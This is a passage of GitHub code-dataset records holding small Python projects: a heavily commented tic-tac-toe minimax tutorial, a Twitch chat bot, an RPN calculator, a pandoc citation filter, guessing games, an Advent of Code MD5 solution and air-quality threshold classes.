kaybetmesi anlamına gelen ve sonuçta sıfır toplamla bitan oyunlarda, oyun sonunun\n# öngörülmesi için kullanılan bir algoritmadır. satranç, go, tictactoe gibi masa oyunları, sıfır\n# kazançlı oyunların güzel örneklerindendir. algoritmayı anlamak için önce bir minimax ağacı çizmek\n# gerekir. örnek bir ağaç üzerinden durumu daha iyi anlatabiliriz.\n# | O | O | X | # hamle sırası Xte iken 3 adet boş kare yani\n# İncelenen Konum (1) | X | | O | # Xin yapabileceği 3 adet hamle vardır.\n# | | | X |\n# | | |\n# / | \\\n# ----------------- | ----------------------\n# | | |\n# | O | O | X | | O | O | X | | O | O | X | # O'nun hamle sırasında\n# X oynar | X | X | O | (2) | X | | O | (3) | X | | O | (4) # oynayabileceği 2 kare\n# | | | X | | | X | X | | X | | X | # kalmıştır. yani her bir\n# / \\ / \\ / \\ # dal için ikişer dal daha\n# | | | | | | # iner\n# O |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| \n# Oynar |X|X|O|(5)|X|X|O| (6) (7)|X| |O| |X|O|O|(8) (9)|X|O|O| |X| |O|(10) # her bir durumda X için bir\n# | |O|X| |O| |X| |O|X|X| | |X|X| |X| |X| |X|O|X| # hamle kalmıştır. buradan sonrası\n# | | | | | | # kazanç, kayıp veya beraberliği belirliyor.\n# X |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| \n# Oynar |X|X|O| |X|X|O|->0 0<-|X|X|O| |X|O|O|->1 1<-|X|O|O| |X|X|O|->1 # şimdi bu hamlelerin hepsinde artık oyun\n# 1<-|X|O|X| |O|X|X| |O|X|X| |X|X|X| |X|X|X| |X|O|X| # bitti. bu sebeple artık incelemeye geçebiliriz\n# # burada kazanç oyunlara 1 beraberliklere 0 kayıp\n# # oyunlara -1 veriyoruz. \n# işin minimax kısmına geldik. Xin en iyi hamlesini belirlemek için ağacın en altından en üstüne doğru gitmemiz lazım. üste\n# doğru giderken eğer hamleyi yapan X ise üste maximun olan sayıyı geçiriyoruz. 
","repo_name":"pfnet-research/kaggle-lyft-motion-prediction-4th-place-solution","sub_path":"src/lib/training/exponential_moving_average.py","file_name":"exponential_moving_average.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"31"} +{"seq_id":"13456830582","text":"import math\nimport random\n\n# a player superclass that describes both the computer and the human user\nclass Player():\n    def __init__(self, letter):\n        self.letter = letter\n\n    def get_move(self, game):\n        pass\n\nclass RandomComputerPlayer(Player):\n    def __init__(self, letter):\n        # we may want to tweak this later, so define an init here just in case\n        super().__init__(letter)\n\n    def get_move(self, game):\n        choice = random.choice(game.available_moves())\n        return choice\n\nclass HumanPlayer(Player):\n    def __init__(self, letter):\n        super().__init__(letter)\n\n    def get_move(self, game):\n        valid_choice = False\n        val = None\n        while not valid_choice:\n            choice = input(self.letter + '\\'s turn. Input move (0-8): ')\n            try:\n                val = int(choice)\n                if val not in game.available_moves():\n                    raise ValueError\n                valid_choice = True\n            except ValueError:\n                print('Invalid choice. Try again.')\n        return val\n\n# the RandomComputerPlayer defined above only makes random moves and usually loses.\n# to prevent that, we can use an algorithm called minimax to make the computer play\n# the best possible move every time.\n\n# the word minimax comes from minimum-maximum. it is an algorithm for looking ahead\n# to the end of zero-sum games, i.e. games in which one side's win means the other\n# side's loss, so the total payoff is zero. board games such as chess, go and\n# tic-tac-toe are good examples of zero-sum games. to understand the algorithm it\n# helps to draw a minimax tree first; an example tree explains the situation best.\n#\n#                                      | O | O | X |      # with X to move there are 3 empty squares,\n#        Position under review (1)     | X |   | O |      # i.e. 3 moves that X can make.\n#                                      |   |   | X |\n#                          /                  |                   \\\n#           | O | O | X |             | O | O | X |             | O | O | X |      # on O's turn 2 squares are\n#  X plays  | X | X | O | (2)         | X |   | O | (3)         | X |   | O | (4)  # left, so each branch\n#           |   |   | X |             |   | X | X |             | X |   | X |      # splits into two more\n#             /       \\                 /       \\                 /       \\\n#          |O|O|X|   |O|O|X|         |O|O|X|   |O|O|X|         |O|O|X|   |O|O|X|\n#  O plays |X|X|O|(5)|X|X|O|(6)   (7)|X| |O|   |X|O|O|(8)   (9)|X|O|O|   |X| |O|(10)  # one move is left for X in each\n#          | |O|X|   |O| |X|         |O|X|X|   | |X|X|         |X| |X|   |X|O|X|      # case; what follows decides\n#                                                                                     # win, loss or draw.\n#          |O|O|X|   |O|O|X|         |O|O|X|   |O|O|X|         |O|O|X|   |O|O|X|\n#  X plays |X|X|O|   |X|X|O|->0   0<-|X|X|O|   |X|O|O|->1   1<-|X|O|O|   |X|X|O|->1   # the game is now over in every\n#       1<-|X|O|X|   |O|X|X|         |O|X|X|   |X|X|X|         |X|X|X|   |X|O|X|      # branch, so we score: wins get\n#                                                                                     # 1, draws 0 and losses -1.\n#\n# now for the minimax part itself. to determine X's best move we walk the tree from\n# the very bottom back up to the top. on the way up, if X made the move we pass the\n# maximum of the numbers upwards, because X aims for the maximum payoff for itself.\n# but when it is O's turn we pass the minimum upwards instead, because we assume O\n# aims for the minimum payoff for X. climbing one level up from the bottom row the\n# same numbers simply carry over, since those were the last moves: 5 => 1 | 6 => 0 |\n# 7 => 0 | 8 => 1 | 9 => 1 and 10 => 1. at the nodes where O moved we pass the\n# minimum up this time: from 5 and 6 to node 2 we take 0, from 7 and 8 to node 3 we\n# take 0, and from 9 and 10 to node 4 we take 1, which leaves 2 => 0 | 3 => 0 |\n# 4 => 1. now we go to the root, the initial position, and determine the best move.\n# since we are at an \"X plays\" node there, we must choose the maximum, i.e. 4. so in\n# position 1 the best move X can make turns out to be move number 4.\n\n# when scoring, it is also a useful practice to take the length of the game into\n# account. the computer then aims not merely for a win but for the shortest path to\n# a win. to do this, the move count must be added to the score as a parameter; note\n# that the number of remaining moves is a function of the number of empty squares\n# left. starting from a different initial position we can build one more tree:\n#\n#                                 | X | O | X |\n#         Initial state           | X | O |   |\n#                                 |   |   | O |\n#                               /        |        \\\n#  MAXIMIZER           (-2)    /      (3)|         \\    (0)\n#  (max goes up)              /          |          \\\n#                | X | O | X |      | X | O | X |      | X | O | X |\n#  X plays       | X | O | X |      | X | O |   |      | X | O |   |\n#                |   |   | O |      | X |   | O |      |   | X | O |\n#  MINIMIZER     (0) /   \\ (-2)     UF=1*(2+1)=3       (1) /   \\ (0)\n#  (min goes up)    /     \\                               /     \\\n#          | X | O | X |   | X | O | X |        | X | O | X |   | X | O | X |\n#  O plays | X | O | X |   | X | O | X |        | X | O | O |   | X | O |   |\n#          | O |   | O |   |   | O | O |        |   | X | O |   | O | X | O |\n#  MAXIMIZER     | (0)      UF=-1*(1+1)=-2           | (1)           | (0)\n#  (max goes up) |                                   |               |\n#          | X | O | X |                        | X | O | X |   | X | O | X |\n#  X plays | X | O | X |                        | X | O | O |   | X | O | X |\n#          | O | X | O |                        | X | X | O |   | O | X | O |\n#         UF=0*(0+1)=0                         UF=1*(0+1)=1    UF=0*(0+1)=0\n#\n# in the decision tree above there are far more possibilities for how the game can\n# end: X can lose, win in 1 or 2 moves, or the game can end in a draw. in such a\n# situation the plain 1, 0, -1 scheme is not enough to score the moves, because it\n# cannot capture the utility correctly. for that we must build a utility function.\n# the utility function has to reflect both whether the position is a win or a loss\n# and in how many moves that position is reached. to get this, we multiply the state\n# of the position (1, 0 or -1) by the number of empty squares left on the board plus\n# 1 (plus 1 so that a win in the final position scores 1 rather than 0). then, just\n# as above, we climb back up to the root taking the maximum over X's moves and the\n# minimum over O's moves.\n# so the most advantageous move is the one that gives us a utility of +3.\n#\n# now we need to put this into our code\nclass GeniusComputerPlayer(Player):\n    def __init__(self, letter):\n        super().__init__(letter)\n\n    def get_move(self, game):\n        # if every square is still empty, making a random move is enough; nothing more is needed\n        if len(game.available_moves()) == 9:\n            choice = random.choice(game.available_moves())\n        else:\n            # otherwise we have to pick the square to play with the minimax algorithm; for that\n            # we create a method called minimax and call it here.\n            choice = self.minimax(game, self.letter)['position'] # note we get a dictionary as output, not a position.\n        return choice\n    # def minimax(self, state, player):\n    #     max_player = self.letter # yourself\n    #     other_player = 'O' if player == 'X' else 'X'\n\n    #     # first we want to check if the previous move is a winner\n    #     if state.current_winner == other_player:\n    #         return {'position': None, 'score': 1 * (len(state.available_moves()) + 1) if other_player == max_player else -1 * (len(state.available_moves()) + 1)}\n    #     elif not state.empty_squares():\n    #         return {'position': None, 'score': 0}\n\n    #     if player == max_player:\n    #         best = {'position': None, 'score': -math.inf} # each score should maximize\n    #     else:\n    #         best = {'position': None, 'score': math.inf} # each score should minimize\n    #     for possible_move in state.available_moves():\n    #         state.make_move(possible_move, player)\n    #         sim_score = self.minimax(state, other_player) # simulate a game after making that move\n\n    #         # undo move\n    #         state.board[possible_move] = ' '\n    #         state.current_winner = None\n    #         sim_score['position'] = possible_move # this represents the optimal next move\n\n    #         if player == max_player: # X is max player\n    #             if sim_score['score'] > best['score']:\n    #                 best = sim_score\n    #         else:\n    #             if sim_score['score'] < best['score']:\n    #                 best = sim_score\n    #     return best\n    def minimax(self, state, player): # we say state here instead of game because it reads better: the method does not\n        # evaluate the game as a whole but a snapshot of it taken at one moment. this is purely semantic;\n        # it is still the game itself, but calling it state is clearer.\n        # we define two names: the maximum player, i.e. us, and the other player, i.e. the opponent:\n        max_player = self.letter\n        other_player = 'O' if player == 'X' else 'X' # CAREFUL HERE! when I accidentally wrote max_player instead,\n        # the bot played only slightly better than random, most likely because other_player never changed\n        # after the first predicted move.\n        # first check whether the current position already has a winner, so no work is wasted if the game is\n        # over. minimax is a recursive function, i.e. it calls itself, and on every call max player and other\n        # player swap roles: while evaluating the opponent's replies, the opponent is the max player and we\n        # are the other player. that is why, just below, the score is multiplied by +1 if the previous mover\n        # is the max player and by -1 otherwise (the reason for the conditional expression)\n        if state.current_winner == other_player:\n            return {\n                'position': None,\n                'score': 1 * (len(state.available_moves()) + 1) if other_player == max_player else -1 * (len(state.available_moves()) + 1)\n            }\n        elif not state.available_moves(): # no moves left and no current_winner, i.e. the examined position is a draw:\n            return {'position': None, 'score': 0}\n        # if there is no winner and empty squares remain, execution simply continues from here, so no else is\n        # needed: in the terminal cases the function has already returned the appropriate dictionaries and the\n        # rest is never reached.\n        # first build our base dictionaries: position None and, by default, a score of -infinity (when we are\n        # the max player, so that \"no move made\" stays smaller than anything) or +infinity (when the opponent\n        # is the max player). these values get updated according to the game state further down.\n        if player == max_player: # the infinities are used so that the \"no move made yet\" case always\n            best_choice = {'position': None, 'score': -math.inf} # loses the comparison against a real move;\n        else: # that is why it is -math.inf when the max player is us and +math.inf when it is the opponent.\n            best_choice = {'position': None, 'score': math.inf} # a little confusing, but important to understand\n        # now we check every possible move, scanning the empty squares with a for loop:\n        for possible_move in state.available_moves():\n            # pretend this move was made; as mentioned, moves are made with the make_move function of the\n            # TicTacToe class:\n            state.make_move(possible_move, player)\n            # with the move made, we simulate the score. after make_move runs, state is the position in which\n            # that move was played; from there we run minimax again with the other player, and this part is\n            # the recursion. minimax takes two arguments, state and player; this time the new state and\n            # other_player:\n            sim_score = self.minimax(state, other_player)\n            # once this recursion bottoms out, i.e. everything down to the win-lose-draw condition has been\n            # scanned, we must reset the position so the next candidate move is computed from the original\n            # one; the current winner must be reset as well.\n            state.board[possible_move] = ' '\n            state.current_winner = None\n            # here we also set the position entry of the sim_score dictionary to possible_move, so the\n            # resulting entry represents the move that was tried:\n            sim_score['position'] = possible_move\n            # sim_score is now a two-element dictionary holding the move tried in this pass of the loop and\n            # the score obtained from it. if this move scores better than the best computed so far\n            # (best_choice), this sim_score dictionary becomes best_choice. but we also have to check who the\n            # player is: if we are the max_player we take the larger score, and for the opponent the smaller\n            # one, because we assume the opponent, as max_player, plays the move that is worst for us, i.e.\n            # the one with the smallest score.\n            if player == max_player:\n                if sim_score['score'] > best_choice['score']:\n                    best_choice = sim_score\n            else:\n                if sim_score['score'] < best_choice['score']:\n                    best_choice = sim_score\n        return best_choice # FINALLY DONE :'D read it once more from the top to make it all click
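\n\n# A quick sanity check, sketched under assumptions: the game module, TicTacToe class\n# and play() helper below are stand-in names for the rest of this project, not code\n# that is known to exist here; adjust the import to the actual game code. Two minimax\n# players should always play each other to a draw:\n#\n#   from game import TicTacToe, play   # hypothetical import\n#   x_player = GeniusComputerPlayer('X')\n#   o_player = GeniusComputerPlayer('O')\n#   result = play(TicTacToe(), x_player, o_player, print_game=False)\n#   assert result is None  # no winner, i.e. a draw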
+{"seq_id":"22047722182","text":"import os\nimport logging\nimport twitchio.websocket\nimport asyncio\nimport tracemalloc\nimport json5\nimport requests\nimport vlc\nfrom flask import Flask, escape, request\n\nimport urlfetch\nimport twitchio\n\nfrom bot_helpers import *\nfrom twitchio.ext import commands\nfrom twitchio import webhook\nfrom enum import Enum\n\nfrom dotenv import load_dotenv\n\nfrom PyQt5 import QtCore\n\n\n\nclass TTSVoice(Enum):\n    Brian = \"Brian\"\n    Ivy = \"Ivy\"\n    Justin = \"Justin\"\n\nclass SimpleCommand(object):\n    def __init__(self, name, aliases, message):\n        self.name = name\n        self.aliases = aliases\n        self.message = message\n\n    async def response(self, context):\n        assert isinstance(context, twitchio.Context)\n        self.message = self.message.replace(\"$User\", context.message.author.name)\n        for msg in self.message.splitlines():\n            await context.send(msg)\n\n\nclass BotThread(QtCore.QThread):\n    def __init__(self, bot):\n        QtCore.QThread.__init__(self)\n        self.bot = bot\n\n    def run(self):\n        loop = self.bot.Application.loop\n        loop.run_until_complete(self.bot._ws._connect())\n\n        try:\n            loop.run_until_complete(self.bot._ws._listen())\n        except KeyboardInterrupt:\n            pass\n        finally:\n            self.bot._ws.teardown()\n\n\n\nclass Bot(commands.Bot):\n    \n    duo_partner = ''\n    simple_commands = []\n    skip_threshold = 2 ##todo: make this a value of current view count (25% of view count)\n    skip_requests = []\n\n    def __init__(self, app, args):\n        self.Application = app\n        self.args = args\n\n        logging.info(f\"Initializing Bot...\")\n        super().__init__(irc_token=os.getenv('TMI_TOKEN'),\n                         client_id=os.getenv('CLIENT_ID'),\n                         nick=os.getenv('BOT_NICK'),\n                         prefix=os.getenv('BOT_PREFIX'),\n                         initial_channels=[os.getenv('CHANNEL')],\n                         loop = self.Application.loop)\n        \n        logging.info(\"Connecting to channel \" + self.initial_channels[0])\n\n        logging.info(f'Loading Commands')\n\n        with open('commands.json5') as json_file:\n            self.simple_commands = json5.load(json_file)\n\n        for cmd_json in self.simple_commands:\n            cmd = SimpleCommand(cmd_json['name'], cmd_json['aliases'], cmd_json['message'])\n            new_cmd = commands.Command(name=cmd.name, aliases=cmd.aliases, func=cmd.response)\n            self.add_command(new_cmd)\n\n        logging.info(f'Commands Loaded')\n\n\n\n\n    async def event_raw_pubsub(self, data):\n        logging.debug(f'Raw Pubsub: {data}')\n        return await super().event_raw_pubsub(data)\n    \n    async def event_pubsub(self, data):\n        logging.debug(f'Pubsub: {data}')\n        return await super().event_pubsub(data)\n\n    async def event_webhook(self, data):\n        logging.debug(f'Webhook Event: {data}')\n\n    async def event_ready(self):\n        logging.info(f'{self.nick} is online!')\n        ws = self._ws  # this is only needed to send messages within event_ready\n\n        if (self.args.release == \"1\"):\n            await ws.send_privmsg(self.initial_channels[0], f\"/me beep boop\")\n        \n        # topic=twitchio.StreamChanged(user_id=46526863)\n        #await self.modify_webhook_subscription(mode=twitchio.WebhookMode.subscribe,\n        #                                       topic=twitchio.StreamChanged(user_id=46526863), lease_seconds=864000)\n        \n        await self.pubsub_subscribe(os.getenv('USER_TOKEN'), 'channel-points-channel-v1.46526863')\n        \n\n    async def event_message(self, message):\n        assert isinstance(message, twitchio.dataclasses.Message)\n        logging.info(f'[{message.author.name}]: {message.content}')\n        if message.author.name.lower() == self.nick.lower():\n            return\n\n        headers = message.raw_data.split(\" :\")\n        dictionary = StringToDict(headers[0])\n\n        # custom reward logic\n        if 'custom-reward-id' in dictionary.keys():\n            logging.debug(f\"Custom Reward ID: {dictionary['custom-reward-id']}\")\n            \n            #song request\n            if dictionary['custom-reward-id'] == os.getenv('SONG_REQUEST_ID'): \n\n                try:\n                    logging.info(f\"Song Request Received - Adding to Queue... URL: {headers[2]}\")\n                    media = await self.Application.AddMedia(uri=headers[2]) # add song to vlc queue\n                    log_msg = f\"{message.author.name} added \\\"{media.Video.title}\\\" to queue!\"\n                    await self._ws.send_privmsg(self.initial_channels[0], log_msg)\n                    \n\n                except Exception as e:\n                    log_msg = f\"Song Request Failed, you owe 1000 pants to {message.author} - Error {e}\"\n                    logging.error(log_msg)\n                    await self._ws.send_privmsg(self.initial_channels[0], log_msg)\n\n            #tts message todo: maybe migrate to JS since you will probably want a cool little popup on screen :0\n            if dictionary['custom-reward-id'] == os.getenv('TTS_REQUEST_ID'):\n                logging.info(f\"TTS Message Requested... Message: {headers[2]}\")\n                self.Application.AddTTSMessage(headers[2])\n            \n\n\n        else:\n            await self.handle_commands(message)\n\n    async def event_command_error(self, context, error):\n        assert isinstance(context, twitchio.dataclasses.Context)\n        logging.error(error)\n        #await context.send(error)\n\n\n    @commands.command(name='dadjoke')\n    async def dadjoke(self, context):\n        response = urlfetch.get('https://api.scorpstuff.com/dadjokes.php')\n        await context.send(response.text)\n\n    @commands.command(name='followage')\n    async def followage(self, context):\n        response = urlfetch.get(f'https://twitch.api.scorpstuff.com/followed.php?caster={context.channel.name}&follower={context.author.name}')\n        await context.send(response.text)\n\n    @commands.command(name='advice')\n    async def advice(self, context):\n        response = urlfetch.get('https://api.scorpstuff.com/advice.php')\n        await context.send(response.text)\n\n    @commands.command(name='duo')\n    async def duo(self, context):\n        assert isinstance(self.duo_partner, twitchio.Message)\n        if len(self.duo_partner.content) == 0:\n            await context.send(f'All by myself PepeHands')\n        else:\n            await context.send(f'I am duoing with twitch.tv/{self.duo_partner.content}')\n\n    @commands.command(name='setduo', aliases=[\"set_duo\", \"duoset\", \"duo_set\", \"editduo\", \"edit_duo\"])\n    @commands.check(is_mod)\n    async def set_duo(self, context):\n        self.duo_partner = context.message\n        await context.send(f'{context.message.author.name} set duo to {self.duo_partner.content}')\n\n\n    @commands.command(name='subcount')\n    async def subcount(self, context):\n        assert isinstance(context, twitchio.dataclasses.Context)\n        stream = await context.channel.get_stream()\n        logging.debug(stream)\n        await context.send(f'{subcount} people have Subscribed')\n    \n    #### media commands ####\n\n    @commands.command(name='play')\n    @commands.check(is_mod)\n    async def songrequest_play(self, context):\n        
await self.media_session.vlc_player.play()\n\n @commands.command(name='pause')\n @commands.check(is_mod)\n async def songrequest_pause(self, context):\n await self.media_session.vlc_player.pause()\n\n @commands.command(name='song')\n async def song(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n\n pass\n\n @commands.command(name='skip')\n async def skip(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n if self.Application.media_list_player.get_state() == vlc.State.Playing:\n if context.author in self.skip_requests:\n await context.send(f'{context.author.name} has already made a skip request!')\n else:\n self.skip_requests.append(context.author)\n if len(self.skip_requests) >= self.skip_threshold:\n self.Application.onSkipPressed()\n await context.send(f'Skipping current song!')\n return\n skip_difference = self.skip_threshold - len(self.skip_requests)\n await context.send(f'{context.author.name} has voted to skip the current song! {skip_difference} more votes required to skip')\n else:\n await context.send('No song is playing!')\n\n #####\n\n @commands.command(name='addcommand', aliases=['addcom'])\n @commands.check(is_mod)\n async def addcommand(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n\n _, command_syntax, command_response = context.message.content.split(maxsplit=2)\n\n logging.info(f'Creating Command {command_syntax}: {command_response}')\n cmd = SimpleCommand(command_syntax, [], command_response)\n if cmd not in self.simple_commands:\n self.simple_commands.append(cmd.__dict__)\n new_cmd = commands.Command(name=cmd.name, aliases=cmd.aliases, func=cmd.response)\n self.add_command(new_cmd)\n else:\n logging.error(f'Command Already Exists!')\n return\n\n logging.info(f'Saving Command to JSON')\n with open('commands.json5', 'w') as json_file:\n json5.dump(self.simple_commands, json_file)\n\n\n\n\n @commands.command(name='help')\n async def help(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n for cmd in self.commands:\n assert isinstance(cmd, commands.Command)\n await context.send(f\"{cmd.name}: \")\n\n\n\n @commands.command(name='ban') #???\n async def ban(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n command_syntax, command_response = context.message.content.split(maxsplit=2)\n await context.send(f\"{command_response} has been Banned! 
Kappa\")\n\n\n\n","repo_name":"InclementDab/Twitch-Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":10026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37920182855","text":"#!/usr/bin/env python3\nimport operator\nfrom datetime import datetime\nimport sys\n\nops = {\n '+': operator.add,\n '-': operator.sub,\n '^': operator.pow,\n}\n\ndef calculate(myarg):\n stack = list()\n\n\n for token in myarg.split():\n \n try:\n stack.append(int(token))\n\n except ValueError:\n \n arg2 = stack.pop()\n arg1 = stack.pop()\n function = ops[token]\n \n result = function(arg1, arg2)\n print(result)\n stack.append(result)\n\n return stack.pop()\n\ndef main():\n \n while True:\n input_text = input(\"rpn calc> \")\n result = calculate(input_text)\n\nif __name__ == '__main__':\n main()\n","repo_name":"hyunchun/c4cs-f17-rpn","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12770850911","text":"#!/usr/bin/env python\n\n\"\"\"\nPandoc filter to citeproc-py.\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom citeproc.py2compat import *\nimport sys\nimport functools\n\n# The references are parsed from a BibTeX database, so we import the\n# corresponding parser.\nfrom citeproc.source.bibtex import BibTeX\n\n# Import the citeproc-py classes we'll use below.\nfrom citeproc import CitationStylesStyle, CitationStylesBibliography\nfrom citeproc import formatter\nfrom citeproc import Citation, CitationItem\n\nfrom pandocfilters import walk, RawInline, RawBlock, Cite, Span, Str, Para, Div, attributes\nimport json\nimport logging\n\ndef citation_register(key, value, format, meta):\n if key == 'Cite':\n citation = Citation([CitationItem(value[0][0]['citationId'])])\n bibliography.register(citation)\n citations.append(citation)\n\ndef citation_replace(key, value, format, meta):\n if key == 'Cite':\n global counter\n citation = citations[counter]\n counter = counter + 1\n bib_citation = bibliography.cite(citation, logging.warn)\n if isinstance(bib_citation, basestring):\n rendered_citation = render(bib_citation)\n else:\n rendered_citation = render(''.join(bib_citation)) # important if there's an \"et al.\", for example\n return Cite(value[0], [rendered_citation])\n\ndef value_of_metadata(result):\n result_value = result['c']\n \n if isinstance(result_value, basestring): # sometimes the value is a string (if passed as cli argument)\n return result_value\n else:\n return result_value[0]['c'] # other times it's a string inside an array (if in YAML)\n\nif __name__ == \"__main__\":\n # follows the basic model of pandocfilters toJSONFilter, but we do multiple passes\n doc = json.loads(sys.stdin.read())\n if len(sys.argv) > 1:\n format = sys.argv[1]\n else:\n format = \"\"\n \n if format in ['html', 'html5']:\n f = formatter.html\n render = functools.partial(RawInline, 'html')\n elif format == 'rst':\n f = formatter.rst\n render = Str\n else:\n f = formatter.plain\n render = Str\n \n citations = []\n counter = 0\n bibliography_path = None\n csl_path = None\n \n meta = doc[0]['unMeta']\n \n result = meta.get('bibliography', {})\n if result:\n bibliography_path = value_of_metadata(result)\n result = meta.get('csl', {})\n if result:\n csl_path = value_of_metadata(result)\n \n if bibliography_path == None or csl_path == None:\n raise 
Exception('Metadata variables must be set for both bibliography and csl.')\n \n # Parse the BibTeX database.\n bib_source = BibTeX(bibliography_path, encoding='utf-8')\n\n # load a CSL style\n bib_style = CitationStylesStyle(csl_path, validate=False)\n \n bibliography = CitationStylesBibliography(bib_style, bib_source, f)\n \n altered = walk(doc, citation_register, format, doc[0]['unMeta'])\n second = walk(altered, citation_replace, format, doc[0]['unMeta'])\n \n references = []\n for item, key in zip(bibliography.bibliography(), bibliography.keys):\n attrs = {'id': key, 'class':'h-cite'}\n references.append(Div(attributes(attrs),[Para([render(str(item))])]))\n \n second[1].extend(references) # add more paragraphs to the end of the main document list of blocks\n \n json.dump(second, sys.stdout)","repo_name":"npdoty/dissertation","sub_path":"paper-template/cite-filter.py","file_name":"cite-filter.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"24943214061","text":"print('give me two num, i will divide them')\nprint(\"enter 'q' to exit\")\nwhile True:\n num1 = input('first num:')\n if num1 == 'q':\n break\n num2 = input('second num:')\n if num2 == 'q':\n break\n try:\n num = int(num1)/int(num2)\n except ZeroDivisionError:\n print(\"不能除0\")\n else:\n print('sum: ' + str(num))","repo_name":"ly4515/python","sub_path":"jiChu/异常/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21147960311","text":"import sys, functools\nimport hashlib\n\ndef part1(filename):\n with open(filename) as f:\n secret = f.readline().rstrip('\\n')\n\n i = 1\n while True:\n str2hash = f\"{secret}{i}\"\n result = hashlib.md5(str2hash.encode()) \n h = result.hexdigest()\n if h[0:5] == '00000': break\n i += 1\n \n print(f\"part1 >>> Santa's lowest positive number with hx00000 is {i}\")\n\n \ndef part2(filename):\n with open(filename) as f:\n secret = f.readline().rstrip('\\n')\n\n i = 1\n while True:\n str2hash = f\"{secret}{i}\"\n result = hashlib.md5(str2hash.encode()) \n h = result.hexdigest()\n if h[0:6] == '000000': break\n i += 1\n \n print(f\"part2 >>> Santa's lowest positive number with hx000000 is {i}\")\n\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n part1(filename)\n part2(filename)\n","repo_name":"yterradas/advent-of-code","sub_path":"2015/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22130638656","text":"def check_guess(letter, guess):\n if guess.isalpha() == False:\n print(\"Invalid\")\n return False\n elif guess.lower() > letter.lower():\n print(\"Guess is high\")\n return False;\n elif guess.lower() < letter.lower():\n print(\"Guess is low\")\n return False\n else:\n print(\"Guess is correct\")\n return guess.lower() == letter.lower()\n\ndef letter_guess(answer_letter):\n if check_guess(answer_letter,input(\"Enter guess: \")):\n return True\n elif check_guess(answer_letter,input(\"Enter guess: \")):\n return True\n elif check_guess(answer_letter,input(\"Enter guess: \")):\n return True\n else:\n return 
False\n\nletter_guess(\"x\")\n","repo_name":"bebetaro/studyPython","sub_path":"Kazuma/letter_guess.py","file_name":"letter_guess.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14858858584","text":"class Threshold:\n GREEN = \"Good\"\n YELLOW = \"Fair\"\n RED = \"Poor\"\n NONE = \"N/A\"\n WHITE = \"Error\"\n\n\nclass TempThreshold:\n RED = \"Hot\"\n GREEN = \"Good\"\n BLUE = \"Cold\"\n WHITE = \"Error\"\n\n\nclass Temperature(float):\n \"\"\"Temperature is measured in celsius (°C), fahrenheit (°F) or kelvin (K).\"\"\"\n\n def __new__(cls, value):\n return super(Temperature, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.celsius = value\n self.fahrenheit = self.celsius * 9 / 5 + 32\n self.kelvin = self.celsius + 273.15\n\n def threshold(self) -> str:\n if self.celsius > 50 or self.celsius < -20:\n _threshold = TempThreshold.WHITE\n elif self.celsius >= 25:\n _threshold = TempThreshold.RED\n elif self.celsius < 18:\n _threshold = TempThreshold.BLUE\n else:\n _threshold = TempThreshold.GREEN\n return _threshold\n\n\nclass Radon(float):\n \"\"\"Radon is measured in becquerels per cubic meter (Bq/m3) or picocuries per litre (pCi/L).\"\"\"\n\n def __new__(cls, value):\n return super(Radon, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.becquerels = value\n self.picocuries = self.becquerels / 37\n\n def threshold(self) -> str:\n if self.becquerels <= 0 or self.becquerels >= 9000:\n _threshold = Threshold.WHITE\n elif self.becquerels >= 150:\n _threshold = Threshold.RED\n elif self.becquerels < 100:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass Pressure(float):\n \"\"\"Pressure is measured in hectopascals (hPa) or kilopascals (kPa).\"\"\"\n\n def __new__(cls, value):\n return super(Pressure, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.hectopascals = value\n self.kilopascals = self.hectopascals / 10\n\n def threshold(self) -> str:\n if self.hectopascals < 800 or self.hectopascals > 1100:\n _threshold = Threshold.WHITE\n else:\n _threshold = Threshold.NONE\n return _threshold\n\n\nclass CO2(float):\n \"\"\"CO2 is measured in parts per million (ppm) or parts per billion (ppb).\"\"\"\n\n def __new__(cls, value):\n return super(CO2, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.parts_per_million = value\n self.parts_per_billion = self.parts_per_million * 1000\n\n def threshold(self) -> str:\n if self.parts_per_million <= 0 or self.parts_per_million > 30000:\n _threshold = Threshold.WHITE\n elif self.parts_per_million >= 1000:\n _threshold = Threshold.RED\n elif self.parts_per_million < 800:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass VOC(float):\n \"\"\"VOC is measured in parts per billion (ppb) or parts per million (ppm).\"\"\"\n\n def __new__(cls, value):\n return super(VOC, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.parts_per_billion = value\n self.parts_per_million = self.parts_per_billion / 1000\n\n def threshold(self) -> str:\n if self.parts_per_billion <= 0 or self.parts_per_billion >= 30000:\n _threshold = Threshold.WHITE\n elif 